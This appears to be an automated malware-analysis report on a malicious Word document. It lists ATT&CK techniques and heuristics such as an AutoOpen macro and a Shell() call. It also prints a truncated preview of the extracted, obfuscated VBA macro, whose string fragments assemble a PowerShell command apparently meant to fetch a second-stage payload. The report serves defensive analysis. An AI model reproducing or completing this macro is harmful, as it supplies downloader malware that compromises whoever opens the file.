MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Word document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. Specifically, it constructs the string "Hello ""$("seT-iTem" which, when combined with other obfuscated parts, likely aims to download and execute a second-stage payload. The presence of an AutoOpen macro further suggests automatic execution upon opening the document.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29477 bytes |
SHA-256: adee51fe4b0324eebb6e9a6d27276a0af500c479bf96df642c2baf6187a7412f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JLjwIwT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VvbKQSoPO"
Function VWXGBdSiY()
On Error Resume Next
LpmzjI = (EwHJfQ * 42662 + 22629 * CInt(jBiwt - CDbl(12902)) * 3543 * Oct(93715))
jliMVahwhBN = "He" + "ll" + " " + Chr(34) + "$(" + "seT" + "-iT" + "em"
ODjqdX = (Xwsir * 53517 + 80832 * CInt(hXHSR - CDbl(16155)) * 79635 * Oct(92720))
iGvbivs = " 'v" + "ar" + "iAb" + "lE:"
ukwYwi = (opXUF * 30999 + 27568 * CInt(kEHSd - CDbl(64140)) * 43185 * Oct(9626))
aJIrw = "OfS" + "' " + "'')"
VWXGBdSiY = jliMVahwhBN + iGvbivs + aJIrw
PPVwi = (TZHzwt * 51509 + 63657 * CInt(PnqBDV - CDbl(25775)) * 33653 * Oct(17498))
End Function
Function VNEWOVScjV()
On Error Resume Next
iNAXSE = (fkIhN * 12044 + 9884 * CInt(EvwSS - CDbl(47970)) * 17994 * Oct(45587))
JtMJncd = Chr(34) + "+ " + "[st" + "RIN" + "G]" + "('" + "32"
CprVBq = (zMJAR * 36117 + 4337 * CInt(sYOqYt - CDbl(4506)) * 64276 * Oct(71492))
BZvflLRqz = "J70" + "M75" + "M1" + "19Z" + "96G" + "80"
zZOwrQ = (pTUdN * 5268 + 57643 * CInt(GjAwEt - CDbl(72596)) * 86643 * Oct(19971))
ISEIn = "A1" + "04" + "Z3" + "6<5" + "7J" + "36" + "!10"
tKTzmA = (FiBQn * 98178 + 41303 * CInt(acwhKf - CDbl(41766)) * 70223 * Oct(92669))
vEWUtj = "6x9" + "7!1" + "15" + "K4"
KBkjw = (jEYzF * 11950 + 81195 * CInt(UVHXcd - CDbl(37300)) * 70285 * Oct(60087))
UJotZ = "1!1" + "07M" + "10" + "2<1" + "10" + "<9" + "7J"
iRmLz = (XZWhcw * 44894 + 49229 * CInt(ojiaXn - CDbl(39686)) * 73153 * Oct(34209))
mqXDJoso = "10" + "3<1" + "12!" + "36"
pXzIS = (ZWhCfa * 40997 + 9522 * CInt(ZfjIEV - CDbl(95713)) * 65438 * Oct(79958))
EioKoJizDbm = "d1" + "18K" + "101"
VNEWOVScjV = JtMJncd + BZvflLRqz + ISEIn + vEWUtj + UJotZ + mqXDJoso + EioKoJizDbm
tkKHPJ = (VwJXZR * 7870 + 66703 * CInt(cpXCN - CDbl(27961)) * 57114 * Oct(93520))
End Function
Function PTmil()
On Error Resume Next
HldNrr = (IUZNPP * 34508 + 86109 * CInt(FWvGz - CDbl(27408)) * 59883 * Oct(50563))
PiAbUGmPdfj = "!10" + "6!9" + "6K"
tIKma = (HNIIYC * 14775 + 14466 * CInt(hRziU - CDbl(76041)) * 25191 * Oct(45696))
ZjzzjqXlwAm = "107" + "J1" + "05d" + "63" + "x32" + "x8" + "6!8"
CHripw = (GCMzji * 41297 + 87203 * CInt(GCGJUw - CDbl(95974)) * 29334 * Oct(56114))
KHwCCwpw = "7J" + "11" + "0A1"
iQAFN = (kjkSnY * 45224 + 19951 * CInt(RzvKi - CDbl(4870)) * 92537 * Oct(8111))
DwhavCJ = "26" + "K11" + "0<" + "36d" + "57" + "K36"
OlGNJE = (cFQQc * 11093 + 94908 * CInt(QzwkaH - CDbl(65997)) * 58749 * Oct(91859))
wmrXsa = "M1" + "06" + "Z9" + "7J"
DwCEvW = (MQrcZW * 42608 + 62267 * CInt(KTGtm - CDbl(23056)) * 3815 * Oct(94312))
pLWPFVihsGF = "11" + "5x4" + "1Z1" + "07" + "d1"
iDLdcf = (LSGFH * 45236 + 19808 * CInt(iQpGWq - CDbl(56124)) * 55425 * Oct(8836))
fjuqLDz = "02K" + "110" + "K97" + "!10" + "3!1"
PTmil = PiAbUGmPdfj + ZjzzjqXlwAm + KHwCCwpw + DwhavCJ + wmrXsa + pLWPFVihsGF + fjuqLDz
wPXBI = (wFLMTa * 66609 + 76457 * CInt(VODPb - CDbl(3080)) * 75194 * Oct(16780))
End Function
Function vLKLUEfK()
On Error Resume Next
PVWva = (FaGMf * 31723 + 67492 * CInt(JPICM - CDbl(95500)) * 52125 * Oct(6909))
sJjjbENVQG = "12A" + "36<" + "87" + "J12"
BuAcZN = (PJGLmm * 39184 + 1905 * CInt(IHsUWH - CDbl(90437)) * 73507 * Oct(9970))
VMrwj = "5Z1" + "19" + "Z1" + "12d"
zSzaLl = (oVBZa * 60795 + 25414 * CInt(wWJXWX - CDbl(91283)) * 14052 * Oct(45358))
NPLFu = "97" + "G10" + "5Z4" + "2x7"
qijLt = (OXjOKQ * 66893 + 91369 * CInt(awzzE - CDbl(65688)) * 53306 * Oct(59851))
ikuQD = "4d9" + "7M1" + "12"
ZllOiW = (LbXUC * 54972 + 55761 * CInt(BLDzzS - CDbl(62766)) * 75750 * Oct(27711))
NOGpcLpraEz = "K42" + "x83" + "G9" + "7Z" + "102"
vLKLUEfK = sJjjbENVQG + VMrwj + NPLFu + ikuQD + NOGpcLpraEz
wYwHSV = (DsmHO * 480 + 78747 * CInt(KwoLa - CDbl(44600)) * 96038 * Oct(41360))
End Function
Function oMmsfmftVa()
On Error Resume Next
zticf = (swWQl * 95997 + 15079 * CInt(IBGzk - CDbl(82285))
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.